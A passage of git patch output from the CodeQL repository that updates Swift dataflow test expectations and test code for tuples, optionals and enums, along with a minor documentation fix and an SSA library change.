[Tuple element at index 1] : | semmle.label | (...) [Tuple element at index 1] : | -| test.swift:322:18:322:25 | call to source() : | semmle.label | call to source() : | -| test.swift:322:31:322:38 | call to source() : | semmle.label | call to source() : | -| test.swift:327:15:327:15 | t1 [Tuple element at index 0] : | semmle.label | t1 [Tuple element at index 0] : | -| test.swift:327:15:327:18 | .0 | semmle.label | .0 | -| test.swift:328:15:328:15 | t1 [Tuple element at index 1] : | semmle.label | t1 [Tuple element at index 1] : | -| test.swift:328:15:328:18 | .1 | semmle.label | .1 | -| test.swift:331:15:331:15 | t2 [Tuple element at index 0] : | semmle.label | t2 [Tuple element at index 0] : | -| test.swift:331:15:331:18 | .0 | semmle.label | .0 | -| test.swift:332:15:332:15 | t2 [Tuple element at index 1] : | semmle.label | t2 [Tuple element at index 1] : | -| test.swift:332:15:332:18 | .1 | semmle.label | .1 | +| test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | semmle.label | (...) [Tuple element at index 1] : | +| test.swift:331:18:331:25 | call to source() : | semmle.label | call to source() : | +| test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | semmle.label | t1 [Tuple element at index 1] : | +| test.swift:335:15:335:18 | .1 | semmle.label | .1 | +| test.swift:343:5:343:5 | [post] t1 [Tuple element at index 0] : | semmle.label | [post] t1 [Tuple element at index 0] : | +| test.swift:343:12:343:19 | call to source() : | semmle.label | call to source() : | +| test.swift:346:15:346:15 | t1 [Tuple element at index 0] : | semmle.label | t1 [Tuple element at index 0] : | +| test.swift:346:15:346:18 | .0 | semmle.label | .0 | +| test.swift:351:14:351:45 | (...) [Tuple element at index 0] : | semmle.label | (...) [Tuple element at index 0] : | +| test.swift:351:14:351:45 | (...) [Tuple element at index 1] : | semmle.label | (...) [Tuple element at index 1] : | +| test.swift:351:18:351:25 | call to source() : | semmle.label | call to source() : | +| test.swift:351:31:351:38 | call to source() : | semmle.label | call to source() : | +| test.swift:356:15:356:15 | t1 [Tuple element at index 0] : | semmle.label | t1 [Tuple element at index 0] : | +| test.swift:356:15:356:18 | .0 | semmle.label | .0 | +| test.swift:357:15:357:15 | t1 [Tuple element at index 1] : | semmle.label | t1 [Tuple element at index 1] : | +| test.swift:357:15:357:18 | .1 | semmle.label | .1 | +| test.swift:360:15:360:15 | t2 [Tuple element at index 0] : | semmle.label | t2 [Tuple element at index 0] : | +| test.swift:360:15:360:18 | .0 | semmle.label | .0 | +| test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | semmle.label | t2 [Tuple element at index 1] : | +| test.swift:361:15:361:18 | .1 | semmle.label | .1 | subpaths | test.swift:75:21:75:22 | &... : | test.swift:65:16:65:28 | arg1 : | test.swift:65:1:70:1 | arg2[return] : | test.swift:75:31:75:32 | [post] &... : | | test.swift:114:19:114:19 | arg : | test.swift:109:9:109:14 | arg : | test.swift:110:12:110:12 | arg : | test.swift:114:12:114:22 | call to ... : | @@ -345,9 +345,9 @@ subpaths | test.swift:280:15:280:38 | ... ? ... : ... | test.swift:259:12:259:19 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | result | | test.swift:280:15:280:38 | ... ? ... : ... | test.swift:280:31:280:38 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | result | | test.swift:282:15:282:38 | ... ? ... : ... | test.swift:282:31:282:38 | call to source() : | test.swift:282:15:282:38 | ... ? ... : ... | result | -| test.swift:306:15:306:18 | .1 | test.swift:302:18:302:25 | call to source() : | test.swift:306:15:306:18 | .1 | result | -| test.swift:317:15:317:18 | .0 | test.swift:314:12:314:19 | call to source() : | test.swift:317:15:317:18 | .0 | result | -| test.swift:327:15:327:18 | .0 | test.swift:322:18:322:25 | call to source() : | test.swift:327:15:327:18 | .0 | result | -| test.swift:328:15:328:18 | .1 | test.swift:322:31:322:38 | call to source() : | test.swift:328:15:328:18 | .1 | result | -| test.swift:331:15:331:18 | .0 | test.swift:322:18:322:25 | call to source() : | test.swift:331:15:331:18 | .0 | result | -| test.swift:332:15:332:18 | .1 | test.swift:322:31:322:38 | call to source() : | test.swift:332:15:332:18 | .1 | result | +| test.swift:335:15:335:18 | .1 | test.swift:331:18:331:25 | call to source() : | test.swift:335:15:335:18 | .1 | result | +| test.swift:346:15:346:18 | .0 | test.swift:343:12:343:19 | call to source() : | test.swift:346:15:346:18 | .0 | result | +| test.swift:356:15:356:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:356:15:356:18 | .0 | result | +| test.swift:357:15:357:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:357:15:357:18 | .1 | result | +| test.swift:360:15:360:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:360:15:360:18 | .0 | result | +| test.swift:361:15:361:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:361:15:361:18 | .1 | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index 9a0d359d371..b320e2cff84 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -247,44 +247,44 @@ | test.swift:290:16:290:26 | call to signum() | test.swift:290:16:290:26 | OptionalEvaluationExpr | | test.swift:293:16:293:16 | y | test.swift:293:16:293:17 | ...? | | test.swift:293:16:293:26 | call to signum() | test.swift:293:16:293:26 | OptionalEvaluationExpr | -| test.swift:302:9:302:9 | SSA def(t1) | test.swift:304:15:304:15 | t1 | -| test.swift:302:14:302:26 | (...) | test.swift:302:9:302:9 | SSA def(t1) | -| test.swift:304:15:304:15 | t1 | test.swift:305:15:305:15 | t1 | -| test.swift:305:15:305:15 | [post] t1 | test.swift:306:15:306:15 | t1 | -| test.swift:305:15:305:15 | t1 | test.swift:306:15:306:15 | t1 | -| test.swift:306:15:306:15 | [post] t1 | test.swift:308:5:308:5 | t1 | -| test.swift:306:15:306:15 | t1 | test.swift:308:5:308:5 | t1 | -| test.swift:308:5:308:5 | [post] t1 | test.swift:310:15:310:15 | t1 | -| test.swift:308:5:308:5 | t1 | test.swift:310:15:310:15 | t1 | -| test.swift:310:15:310:15 | t1 | test.swift:311:15:311:15 | t1 | -| test.swift:311:15:311:15 | [post] t1 | test.swift:312:15:312:15 | t1 | -| test.swift:311:15:311:15 | t1 | test.swift:312:15:312:15 | t1 | -| test.swift:312:15:312:15 | [post] t1 | test.swift:314:5:314:5 | t1 | -| test.swift:312:15:312:15 | t1 | test.swift:314:5:314:5 | t1 | -| test.swift:314:5:314:5 | [post] t1 | test.swift:316:15:316:15 | t1 | -| test.swift:314:5:314:5 | t1 | test.swift:316:15:316:15 | t1 | -| test.swift:316:15:316:15 | t1 | test.swift:317:15:317:15 | t1 | -| test.swift:317:15:317:15 | [post] t1 | test.swift:318:15:318:15 | t1 | -| test.swift:317:15:317:15 | t1 | test.swift:318:15:318:15 | t1 | -| test.swift:322:9:322:9 | SSA def(t1) | test.swift:323:14:323:14 | t1 | -| test.swift:322:14:322:45 | (...) | test.swift:322:9:322:9 | SSA def(t1) | -| test.swift:323:9:323:9 | SSA def(t2) | test.swift:330:15:330:15 | t2 | -| test.swift:323:14:323:14 | t1 | test.swift:323:9:323:9 | SSA def(t2) | -| test.swift:323:14:323:14 | t1 | test.swift:324:21:324:21 | t1 | -| test.swift:324:9:324:17 | SSA def(a) | test.swift:334:15:334:15 | a | -| test.swift:324:9:324:17 | SSA def(b) | test.swift:335:15:335:15 | b | -| test.swift:324:9:324:17 | SSA def(c) | test.swift:336:15:336:15 | c | -| test.swift:324:21:324:21 | t1 | test.swift:324:9:324:17 | SSA def(a) | -| test.swift:324:21:324:21 | t1 | test.swift:324:9:324:17 | SSA def(b) | -| test.swift:324:21:324:21 | t1 | test.swift:324:9:324:17 | SSA def(c) | -| test.swift:324:21:324:21 | t1 | test.swift:326:15:326:15 | t1 | -| test.swift:326:15:326:15 | t1 | test.swift:327:15:327:15 | t1 | -| test.swift:327:15:327:15 | [post] t1 | test.swift:328:15:328:15 | t1 | -| test.swift:327:15:327:15 | t1 | test.swift:328:15:328:15 | t1 | -| test.swift:328:15:328:15 | [post] t1 | test.swift:329:15:329:15 | t1 | -| test.swift:328:15:328:15 | t1 | test.swift:329:15:329:15 | t1 | -| test.swift:330:15:330:15 | t2 | test.swift:331:15:331:15 | t2 | -| test.swift:331:15:331:15 | [post] t2 | test.swift:332:15:332:15 | t2 | -| test.swift:331:15:331:15 | t2 | test.swift:332:15:332:15 | t2 | -| test.swift:332:15:332:15 | [post] t2 | test.swift:333:15:333:15 | t2 | -| test.swift:332:15:332:15 | t2 | test.swift:333:15:333:15 | t2 | +| test.swift:331:9:331:9 | SSA def(t1) | test.swift:333:15:333:15 | t1 | +| test.swift:331:14:331:26 | (...) | test.swift:331:9:331:9 | SSA def(t1) | +| test.swift:333:15:333:15 | t1 | test.swift:334:15:334:15 | t1 | +| test.swift:334:15:334:15 | [post] t1 | test.swift:335:15:335:15 | t1 | +| test.swift:334:15:334:15 | t1 | test.swift:335:15:335:15 | t1 | +| test.swift:335:15:335:15 | [post] t1 | test.swift:337:5:337:5 | t1 | +| test.swift:335:15:335:15 | t1 | test.swift:337:5:337:5 | t1 | +| test.swift:337:5:337:5 | [post] t1 | test.swift:339:15:339:15 | t1 | +| test.swift:337:5:337:5 | t1 | test.swift:339:15:339:15 | t1 | +| test.swift:339:15:339:15 | t1 | test.swift:340:15:340:15 | t1 | +| test.swift:340:15:340:15 | [post] t1 | test.swift:341:15:341:15 | t1 | +| test.swift:340:15:340:15 | t1 | test.swift:341:15:341:15 | t1 | +| test.swift:341:15:341:15 | [post] t1 | test.swift:343:5:343:5 | t1 | +| test.swift:341:15:341:15 | t1 | test.swift:343:5:343:5 | t1 | +| test.swift:343:5:343:5 | [post] t1 | test.swift:345:15:345:15 | t1 | +| test.swift:343:5:343:5 | t1 | test.swift:345:15:345:15 | t1 | +| test.swift:345:15:345:15 | t1 | test.swift:346:15:346:15 | t1 | +| test.swift:346:15:346:15 | [post] t1 | test.swift:347:15:347:15 | t1 | +| test.swift:346:15:346:15 | t1 | test.swift:347:15:347:15 | t1 | +| test.swift:351:9:351:9 | SSA def(t1) | test.swift:352:14:352:14 | t1 | +| test.swift:351:14:351:45 | (...) | test.swift:351:9:351:9 | SSA def(t1) | +| test.swift:352:9:352:9 | SSA def(t2) | test.swift:359:15:359:15 | t2 | +| test.swift:352:14:352:14 | t1 | test.swift:352:9:352:9 | SSA def(t2) | +| test.swift:352:14:352:14 | t1 | test.swift:353:21:353:21 | t1 | +| test.swift:353:9:353:17 | SSA def(a) | test.swift:363:15:363:15 | a | +| test.swift:353:9:353:17 | SSA def(b) | test.swift:364:15:364:15 | b | +| test.swift:353:9:353:17 | SSA def(c) | test.swift:365:15:365:15 | c | +| test.swift:353:21:353:21 | t1 | test.swift:353:9:353:17 | SSA def(a) | +| test.swift:353:21:353:21 | t1 | test.swift:353:9:353:17 | SSA def(b) | +| test.swift:353:21:353:21 | t1 | test.swift:353:9:353:17 | SSA def(c) | +| test.swift:353:21:353:21 | t1 | test.swift:355:15:355:15 | t1 | +| test.swift:355:15:355:15 | t1 | test.swift:356:15:356:15 | t1 | +| test.swift:356:15:356:15 | [post] t1 | test.swift:357:15:357:15 | t1 | +| test.swift:356:15:356:15 | t1 | test.swift:357:15:357:15 | t1 | +| test.swift:357:15:357:15 | [post] t1 | test.swift:358:15:358:15 | t1 | +| test.swift:357:15:357:15 | t1 | test.swift:358:15:358:15 | t1 | +| test.swift:359:15:359:15 | t2 | test.swift:360:15:360:15 | t2 | +| test.swift:360:15:360:15 | [post] t2 | test.swift:361:15:361:15 | t2 | +| test.swift:360:15:360:15 | t2 | test.swift:361:15:361:15 | t2 | +| test.swift:361:15:361:15 | [post] t2 | test.swift:362:15:362:15 | t2 | +| test.swift:361:15:361:15 | t2 | test.swift:362:15:362:15 | t2 | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 093e8c2db95..983d918a036 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -295,6 +295,35 @@ func test_optionals(y: Int?) { } } + + + + + + + + + + + + + + + + + + + + + + + + + + + + + func sink(arg: (Int, Int)) {} func sink(arg: (Int, Int, Int)) {} @@ -303,7 +332,7 @@ func testTuples() { sink(arg: t1) sink(arg: t1.0) - sink(arg: t1.1) // $ flow=302 + sink(arg: t1.1) // $ flow=331 t1.1 = 2 @@ -314,7 +343,7 @@ func testTuples() { t1.0 = source() sink(arg: t1) - sink(arg: t1.0) // $ flow=314 + sink(arg: t1.0) // $ flow=343 sink(arg: t1.1) } @@ -324,14 +353,14 @@ func testTuples2() { let (a, b, c) = t1 sink(arg: t1) - sink(arg: t1.x) // $ flow=322 - sink(arg: t1.y) // $ flow=322 + sink(arg: t1.x) // $ flow=351 + sink(arg: t1.y) // $ flow=351 sink(arg: t1.z) sink(arg: t2) - sink(arg: t2.x) // $ flow=322 - sink(arg: t2.y) // $ flow=322 + sink(arg: t2.x) // $ flow=351 + sink(arg: t2.y) // $ flow=351 sink(arg: t2.z) - sink(arg: a) // $ MISSING: flow=322 - sink(arg: b) // $ MISSING: flow=322 + sink(arg: a) // $ MISSING: flow=351 + sink(arg: b) // $ MISSING: flow=351 sink(arg: c) } From d7bf2d9375801885e08c71d9235ae8e6f2805e09 Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Fri, 6 Jan 2023 12:07:24 -0500 Subject: [PATCH 119/381] docs for codeql pack compatibility --- docs/codeql/codeql-cli/about-codeql-packs.rst | 2 +- docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/docs/codeql/codeql-cli/about-codeql-packs.rst b/docs/codeql/codeql-cli/about-codeql-packs.rst index 8cfe072f2c9..9e67dd19140 100644 --- a/docs/codeql/codeql-cli/about-codeql-packs.rst +++ b/docs/codeql/codeql-cli/about-codeql-packs.rst @@ -32,7 +32,7 @@ The other files and directories within the pack should be logically organized. F their own top-level directories. About published packs --------------------------- +~~~~~~~~~~~~~~~~~~~~~~~~~ When a pack is published for use in analyses, the ``codeql pack create`` or ``codeql pack publish`` command verifies that the content is complete and also adds some additional pieces of content to it: diff --git a/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst b/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst index afa851e4185..b8dbc4bd6e5 100644 --- a/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst +++ b/docs/codeql/codeql-cli/publishing-and-using-codeql-packs.rst @@ -106,6 +106,7 @@ As a user of a published query pack, you can check that the CodeQL makes use of However, if they instead look like the following, then usage of the precompiled queries failed: :: + Compiling query plan for /long/path/to/query/Filename.ql. [42/108 comp 25s] Compiled /long/path/to/query/Filename.ql. From 8a9a69fa00507fe06629df16c0b5633636ce2856 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Jan 2023 16:37:29 +0000 Subject: [PATCH 120/381] Swift: Add more dataflow tests for of optionals, patterns, enums. --- .../dataflow/dataflow/DataFlow.expected | 7 + .../dataflow/dataflow/LocalFlow.expected | 28 +++- .../dataflow/dataflow/test.swift | 126 ++++++++++++++---- 3 files changed, 126 insertions(+), 35 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index 6a7fd737998..4676c63d995 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -107,6 +107,7 @@ edges | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:275:15:275:27 | ... ??(_:_:) ... | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:279:15:279:31 | ... ? ... : ... | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:280:15:280:38 | ... ? ... : ... | +| test.swift:263:13:263:28 | call to optionalSource() : | test.swift:303:15:303:16 | ...! : | | test.swift:270:15:270:22 | call to source() : | file://:0:0:0:0 | [summary param] this in signum() : | | test.swift:270:15:270:22 | call to source() : | test.swift:270:15:270:31 | call to signum() | | test.swift:271:15:271:16 | ...? : | file://:0:0:0:0 | [summary param] this in signum() : | @@ -114,6 +115,8 @@ edges | test.swift:271:15:271:25 | call to signum() : | test.swift:271:15:271:25 | OptionalEvaluationExpr | | test.swift:280:31:280:38 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() : | test.swift:282:15:282:38 | ... ? ... : ... | +| test.swift:303:15:303:16 | ...! : | file://:0:0:0:0 | [summary param] this in signum() : | +| test.swift:303:15:303:16 | ...! : | test.swift:303:15:303:25 | call to signum() | | test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | | test.swift:331:18:331:25 | call to source() : | test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | | test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | test.swift:335:15:335:18 | .1 | @@ -258,6 +261,8 @@ nodes | test.swift:280:31:280:38 | call to source() : | semmle.label | call to source() : | | test.swift:282:15:282:38 | ... ? ... : ... | semmle.label | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() : | semmle.label | call to source() : | +| test.swift:303:15:303:16 | ...! : | semmle.label | ...! : | +| test.swift:303:15:303:25 | call to signum() | semmle.label | call to signum() | | test.swift:331:14:331:26 | (...) [Tuple element at index 1] : | semmle.label | (...) [Tuple element at index 1] : | | test.swift:331:18:331:25 | call to source() : | semmle.label | call to source() : | | test.swift:335:15:335:15 | t1 [Tuple element at index 1] : | semmle.label | t1 [Tuple element at index 1] : | @@ -306,6 +311,7 @@ subpaths | test.swift:219:13:219:15 | .a [x] : | test.swift:163:7:163:7 | self [x] : | file://:0:0:0:0 | .x : | test.swift:219:13:219:17 | .x | | test.swift:270:15:270:22 | call to source() : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:270:15:270:31 | call to signum() | | test.swift:271:15:271:16 | ...? : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:271:15:271:25 | call to signum() : | +| test.swift:303:15:303:16 | ...! : | file://:0:0:0:0 | [summary param] this in signum() : | file://:0:0:0:0 | [summary] to write: return (return) in signum() : | test.swift:303:15:303:25 | call to signum() | #select | test.swift:7:15:7:15 | t1 | test.swift:6:19:6:26 | call to source() : | test.swift:7:15:7:15 | t1 | result | | test.swift:9:15:9:15 | t1 | test.swift:6:19:6:26 | call to source() : | test.swift:9:15:9:15 | t1 | result | @@ -345,6 +351,7 @@ subpaths | test.swift:280:15:280:38 | ... ? ... : ... | test.swift:259:12:259:19 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | result | | test.swift:280:15:280:38 | ... ? ... : ... | test.swift:280:31:280:38 | call to source() : | test.swift:280:15:280:38 | ... ? ... : ... | result | | test.swift:282:15:282:38 | ... ? ... : ... | test.swift:282:31:282:38 | call to source() : | test.swift:282:15:282:38 | ... ? ... : ... | result | +| test.swift:303:15:303:25 | call to signum() | test.swift:259:12:259:19 | call to source() : | test.swift:303:15:303:25 | call to signum() | result | | test.swift:335:15:335:18 | .1 | test.swift:331:18:331:25 | call to source() : | test.swift:335:15:335:18 | .1 | result | | test.swift:346:15:346:18 | .0 | test.swift:343:12:343:19 | call to source() : | test.swift:346:15:346:18 | .0 | result | | test.swift:356:15:356:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:356:15:356:18 | .0 | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index b320e2cff84..49cafa7d6b6 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -241,12 +241,22 @@ | test.swift:282:26:282:26 | y | test.swift:287:16:287:16 | y | | test.swift:282:26:282:27 | ...! | test.swift:282:15:282:38 | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() | test.swift:282:15:282:38 | ... ? ... : ... | -| test.swift:284:16:284:16 | x | test.swift:290:16:290:16 | x | -| test.swift:287:16:287:16 | y | test.swift:293:16:293:16 | y | -| test.swift:290:16:290:16 | x | test.swift:290:16:290:17 | ...? | -| test.swift:290:16:290:26 | call to signum() | test.swift:290:16:290:26 | OptionalEvaluationExpr | -| test.swift:293:16:293:16 | y | test.swift:293:16:293:17 | ...? | -| test.swift:293:16:293:26 | call to signum() | test.swift:293:16:293:26 | OptionalEvaluationExpr | +| test.swift:284:16:284:16 | x | test.swift:291:16:291:16 | x | +| test.swift:287:16:287:16 | y | test.swift:294:16:294:16 | y | +| test.swift:291:16:291:16 | x | test.swift:291:16:291:17 | ...? | +| test.swift:291:16:291:16 | x | test.swift:298:20:298:20 | x | +| test.swift:291:16:291:26 | call to signum() | test.swift:291:16:291:26 | OptionalEvaluationExpr | +| test.swift:294:16:294:16 | y | test.swift:294:16:294:17 | ...? | +| test.swift:294:16:294:16 | y | test.swift:299:20:299:20 | y | +| test.swift:294:16:294:26 | call to signum() | test.swift:294:16:294:26 | OptionalEvaluationExpr | +| test.swift:298:20:298:20 | x | test.swift:303:15:303:15 | x | +| test.swift:299:20:299:20 | y | test.swift:304:15:304:15 | y | +| test.swift:303:15:303:15 | x | test.swift:303:15:303:16 | ...! | +| test.swift:303:15:303:15 | x | test.swift:306:28:306:28 | x | +| test.swift:304:15:304:15 | y | test.swift:304:15:304:16 | ...! | +| test.swift:304:15:304:15 | y | test.swift:309:28:309:28 | y | +| test.swift:306:28:306:28 | x | test.swift:313:12:313:12 | x | +| test.swift:309:28:309:28 | y | test.swift:319:12:319:12 | y | | test.swift:331:9:331:9 | SSA def(t1) | test.swift:333:15:333:15 | t1 | | test.swift:331:14:331:26 | (...) | test.swift:331:9:331:9 | SSA def(t1) | | test.swift:333:15:333:15 | t1 | test.swift:334:15:334:15 | t1 | @@ -288,3 +298,9 @@ | test.swift:360:15:360:15 | t2 | test.swift:361:15:361:15 | t2 | | test.swift:361:15:361:15 | [post] t2 | test.swift:362:15:362:15 | t2 | | test.swift:361:15:361:15 | t2 | test.swift:362:15:362:15 | t2 | +| test.swift:375:9:375:13 | SSA def(a) | test.swift:377:12:377:12 | a | +| test.swift:375:22:375:23 | .myNone | test.swift:375:9:375:13 | SSA def(a) | +| test.swift:387:9:387:13 | SSA def(b) | test.swift:389:12:389:12 | b | +| test.swift:387:22:387:40 | call to ... | test.swift:387:9:387:13 | SSA def(b) | +| test.swift:399:9:399:9 | SSA def(c) | test.swift:401:12:401:12 | c | +| test.swift:399:13:399:38 | call to ... | test.swift:399:9:399:9 | SSA def(c) | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 983d918a036..6ab6bb49d0f 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -287,43 +287,43 @@ func test_optionals(y: Int?) { if let z = y { sink(arg: z) } + if let z = x?.signum() { // $ MISSING: flow=259 sink(arg: z) } if let z = y?.signum() { sink(arg: z) } + + guard let z1 = x else { return } + guard let z2 = y else { return } + sink(arg: z1) // $ MISSING: flow=259 + sink(arg: z2) + + sink(arg: x!.signum()) // $ flow=259 + sink(arg: y!.signum()) + + if case .some(let z) = x { + sink(arg: z) // $ MISSING: flow=259 + } + if case .some(let z) = y { + sink(arg: z) + } + + switch x { + case .some(let z): + sink(arg: z) // $ MISSING: flow=259 + case .none: + () + } + switch y { + case .some(let z): + sink(arg: z) + case .none: + () + } } - - - - - - - - - - - - - - - - - - - - - - - - - - - - - func sink(arg: (Int, Int)) {} func sink(arg: (Int, Int, Int)) {} @@ -364,3 +364,71 @@ func testTuples2() { sink(arg: b) // $ MISSING: flow=351 sink(arg: c) } + +enum MyEnum { + case myNone + case mySingle(Int) + case myPair(Int, Int) +} + +func testEnums() { + let a : MyEnum = .myNone + + switch a { + case .myNone: + () + case .mySingle(let a): + sink(arg: a) + case .myPair(let a, let b): + sink(arg: a) + sink(arg: b) + } + + if case .mySingle(let x) = a { + sink(arg: x) + } + if case .myPair(let x, let y) = a { + sink(arg: x) + sink(arg: y) + } + + let b : MyEnum = .mySingle(source()) + + switch b { + case .myNone: + () + case .mySingle(let a): + sink(arg: a) // $ MISSING: flow=395 + case .myPair(let a, let b): + sink(arg: a) + sink(arg: b) + } + + if case .mySingle(let x) = a { + sink(arg: x) // $ MISSING: flow=395 + } + if case .myPair(let x, let y) = a { + sink(arg: x) + sink(arg: y) + } + + let c = MyEnum.myPair(0, source()) + + switch c { + case .myNone: + () + case .mySingle(let a): + sink(arg: a) + case .myPair(let a, let b): + sink(arg: a) + sink(arg: b) // $ MISSING: flow=415 + } + + if case .mySingle(let x) = a { + sink(arg: x) + } + if case .myPair(let x, let y) = a { + sink(arg: x) + sink(arg: y) // $ MISSING: flow=415 + } +} From c598d9b8828aba25e6d7ba5185ce8e8e6b49ffea Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 16 Dec 2022 18:16:17 +0000 Subject: [PATCH 121/381] Swift: Generalize an SSA case for variables declared in Patterns. --- swift/ql/lib/codeql/swift/dataflow/Ssa.qll | 11 +++++++++-- .../dataflow/dataflow/LocalFlow.expected | 19 +++++++++++++++++++ .../dataflow/taint/LocalTaint.expected | 2 ++ 3 files changed, 30 insertions(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/dataflow/Ssa.qll b/swift/ql/lib/codeql/swift/dataflow/Ssa.qll index 17ba2d63a7c..c7cfab80398 100644 --- a/swift/ql/lib/codeql/swift/dataflow/Ssa.qll +++ b/swift/ql/lib/codeql/swift/dataflow/Ssa.qll @@ -30,9 +30,16 @@ module Ssa { certain = true ) or - exists(PatternBindingDecl decl, Pattern pattern | + // Any variable initialization through pattern matching. For example each `x*` in: + // ``` + // var x1 = v + // let x2 = v + // let (x3, x4) = tuple + // if let x5 = optional { ... } + // guard let x6 = optional else { ... } + // ``` + exists(Pattern pattern | bb.getNode(i).getNode().asAstNode() = pattern and - decl.getAPattern() = pattern and v.getParentPattern() = pattern and certain = true ) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index 49cafa7d6b6..18c40476aad 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -241,22 +241,32 @@ | test.swift:282:26:282:26 | y | test.swift:287:16:287:16 | y | | test.swift:282:26:282:27 | ...! | test.swift:282:15:282:38 | ... ? ... : ... | | test.swift:282:31:282:38 | call to source() | test.swift:282:15:282:38 | ... ? ... : ... | +| test.swift:284:8:284:12 | SSA def(z) | test.swift:285:19:285:19 | z | | test.swift:284:16:284:16 | x | test.swift:291:16:291:16 | x | +| test.swift:287:8:287:12 | SSA def(z) | test.swift:288:19:288:19 | z | | test.swift:287:16:287:16 | y | test.swift:294:16:294:16 | y | +| test.swift:291:8:291:12 | SSA def(z) | test.swift:292:19:292:19 | z | | test.swift:291:16:291:16 | x | test.swift:291:16:291:17 | ...? | | test.swift:291:16:291:16 | x | test.swift:298:20:298:20 | x | | test.swift:291:16:291:26 | call to signum() | test.swift:291:16:291:26 | OptionalEvaluationExpr | +| test.swift:294:8:294:12 | SSA def(z) | test.swift:295:19:295:19 | z | | test.swift:294:16:294:16 | y | test.swift:294:16:294:17 | ...? | | test.swift:294:16:294:16 | y | test.swift:299:20:299:20 | y | | test.swift:294:16:294:26 | call to signum() | test.swift:294:16:294:26 | OptionalEvaluationExpr | +| test.swift:298:11:298:15 | SSA def(z1) | test.swift:300:15:300:15 | z1 | | test.swift:298:20:298:20 | x | test.swift:303:15:303:15 | x | +| test.swift:299:11:299:15 | SSA def(z2) | test.swift:301:15:301:15 | z2 | | test.swift:299:20:299:20 | y | test.swift:304:15:304:15 | y | | test.swift:303:15:303:15 | x | test.swift:303:15:303:16 | ...! | | test.swift:303:15:303:15 | x | test.swift:306:28:306:28 | x | | test.swift:304:15:304:15 | y | test.swift:304:15:304:16 | ...! | | test.swift:304:15:304:15 | y | test.swift:309:28:309:28 | y | +| test.swift:306:13:306:24 | SSA def(z) | test.swift:307:19:307:19 | z | | test.swift:306:28:306:28 | x | test.swift:313:12:313:12 | x | +| test.swift:309:13:309:24 | SSA def(z) | test.swift:310:19:310:19 | z | | test.swift:309:28:309:28 | y | test.swift:319:12:319:12 | y | +| test.swift:314:10:314:21 | SSA def(z) | test.swift:315:19:315:19 | z | +| test.swift:320:10:320:21 | SSA def(z) | test.swift:321:19:321:19 | z | | test.swift:331:9:331:9 | SSA def(t1) | test.swift:333:15:333:15 | t1 | | test.swift:331:14:331:26 | (...) | test.swift:331:9:331:9 | SSA def(t1) | | test.swift:333:15:333:15 | t1 | test.swift:334:15:334:15 | t1 | @@ -300,7 +310,16 @@ | test.swift:361:15:361:15 | t2 | test.swift:362:15:362:15 | t2 | | test.swift:375:9:375:13 | SSA def(a) | test.swift:377:12:377:12 | a | | test.swift:375:22:375:23 | .myNone | test.swift:375:9:375:13 | SSA def(a) | +| test.swift:380:10:380:25 | SSA def(a) | 